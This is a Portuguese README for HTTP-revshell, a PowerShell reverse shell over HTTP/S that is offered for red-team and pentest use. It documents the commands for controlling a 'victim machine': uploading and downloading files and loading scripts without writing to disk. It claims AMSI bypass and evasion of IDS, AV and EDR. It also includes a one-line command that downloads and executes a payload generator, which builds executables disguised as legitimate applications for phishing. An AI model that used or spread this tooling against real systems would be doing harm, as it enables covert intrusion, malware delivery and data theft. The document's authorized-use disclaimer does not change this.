
Shell reverso do Powershell usando protocolo HTTP/S com bypass do AMSI e consciente de proxy
HTTP-revshell é uma ferramenta focada em exercícios de red team e pentesters. Esta ferramenta fornece uma conexão reversa através do protocolo HTTP/S. Ela utiliza um canal oculto para obter controle sobre a máquina vítima através de requisições web e assim evadir soluções como IDS, IPS e AV.
NOTA: A ferramenta não será mantida em termos de evasão. Com apenas algumas alterações você pode contornar muitos EDRs do mercado.

Uso do servidor:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Host de escuta
port Porta de escuta
optional arguments:
-h, --help mostra esta mensagem de ajuda e sai
--ssl Envia tráfego via ssl
--autocomplete Autocompletar funções do powershell
Uso do cliente:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
Esta função permite que você faça upload de qualquer arquivo para a máquina vítima.
Uso:
upload /src/path/file C:\dest\path\file
Esta função permite que você faça o download de um arquivo para a máquina do atacante.
Uso:
download C:\src\path\file /dst/path/file
Esta função permite carregar scripts powershell sem precisar escrever no disco da vítima, lendo o arquivo através de tráfego HTTP legítimo.
Uso:
loadps1 /path/to/the/local/server/PowershellScript.ps1
Este script permite criar um arquivo executável com o payload necessário para usar o HTTP-revshell, você só precisa seguir as instruções na tela para gerá-lo. Existem 6 modelos predefinidos e um personalizável, com os dados que você preferir.
Os payloads gerados pela ferramenta incorporam o ícone legítimo da aplicação, bem como as informações de produto e direitos autorais da aplicação original. Além disso, cada um deles abre a aplicação original antes de estabelecer a conexão com o servidor, fingindo ser uma aplicação legítima. Isso pode ser usado para phishing ou exercícios de Red Team.
Uso do Gerador de Payload:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

IMPORTANTE: Todos os campos nos modelos predefinidos são preenchidos automaticamente ao pressionar a tecla enter.
Este script está licenciado sob LGPLv3+. Link direto para Licença.
HTTP-revshell deve ser usado apenas para testes de penetração autorizados e/ou fins educacionais sem fins lucrativos. Qualquer uso indevido deste software não será de responsabilidade do autor ou de qualquer outro colaborador. Use-o em seus próprios servidores e/ou com a permissão do proprietário do servidor.